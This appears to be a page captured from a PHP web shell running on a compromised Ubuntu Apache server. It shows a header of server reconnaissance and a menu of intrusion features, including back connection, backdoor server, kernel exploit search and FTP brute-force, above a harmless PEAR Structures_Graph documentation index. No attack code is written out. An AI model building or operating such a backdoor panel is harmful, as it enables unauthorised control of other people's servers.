|
System | : | Linux MiraNet 3.0.0-14-generic-pae #23-Ubuntu SMP Mon Nov 21 22:07:10 UTC 2011 i686 |
Software | : | Apache. PHP/5.3.6-13ubuntu3.10 |
ID | : | uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
|
|
Safe Mode | : | OFF |
Open_Basedir | : | OFF |
Freespace | : | 22.6 GB of 70.42 GB (32.09%) |
|
MySQL: ON MSSQL: OFF Oracle: OFF PostgreSQL: OFF Curl: OFF Sockets: ON Fetch: OFF Wget: ON Perl: ON |
Disabled Functions: pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
|
[ System Info ]
[ Processes ]
[ SQL Manager ]
[ Eval ]
[ Encoder ]
[ Mailer ]
[ Back Connection ]
[ Backdoor Server ]
[ Kernel Exploit Search ]
[ MD5 Decrypter ]
[ Reverse IP ]
[ Kill Shell ]
[ FTP Brute-Force ]
|
|
/
usr/
share/
doc/
php5-common/
PEAR/
Structures_Graph/
docs/
html/
- drwxr-xr-x
|
Viewing file: elementindex.html (15.26 KB) -rw-r--r--Select action/file-type:  ( +) |  ( +) |  ( +) | Code ( +) | Session ( +) |  ( +) | SDB ( +) |  ( +) |  ( +) |  ( +) |  ( +) |  ( +) |
Full index
Package indexes
-
addNode
-
Add a Node to the Graph
-
AcyclicTest.php
-
-
connectsTo
-
Test wether this node has an arc to the target node
-
connectTo
-
Connect this node to another one.
-
getData
-
Node data getter.
-
getGraph
-
Node graph getter
-
getMetadata
-
Node metadata getter
-
getNeighbours
-
Return nodes connected to this one.
-
getNodes
-
Return the node set, in no particular order. For ordered node sets, use a Graph Manipulator insted.
-
Graph.php
-
-
inDegree
-
Calculate the in degree of the node.
-
isAcyclic
-
isAcyclic returns true if a graph contains no cycles, false otherwise.
-
isDirected
-
Return true if a graph is directed
-
metadataKeyExists
-
Test for existence of metadata under a given key.
-
Node.php
-
-
outDegree
-
Calculate the out degree of the node.
-
removeNode
-
Remove a Node from the Graph
-
setData
-
Node data setter
-
setGraph
-
Node graph setter. This method should not be called directly. Use Graph::addNode instead.
-
setMetadata
-
Node metadata setter
-
sort
-
sort returns the graph's nodes, sorted by topological order.
-
Structures_Graph
-
The Structures_Graph class represents a graph data structure.
-
Structures_Graph
-
Constructor
-
STRUCTURES_GRAPH_ERROR_GENERIC
-
-
Structures_Graph_Manipulator_AcyclicTest
-
The Structures_Graph_Manipulator_AcyclicTest is a graph manipulator which tests whether a graph contains a cycle.
-
Structures_Graph_Manipulator_TopologicalSorter
-
The Structures_Graph_Manipulator_TopologicalSorter is a manipulator which is able to return the set of nodes in a graph, sorted by topological order.
-
Structures_Graph_Node
-
Constructor
-
Structures_Graph_Node
-
The Structures_Graph_Node class represents a Node that can be member of a graph node set.
-
TopologicalSorter.php
-
-
unsetMetadata
-
Delete metadata by key
|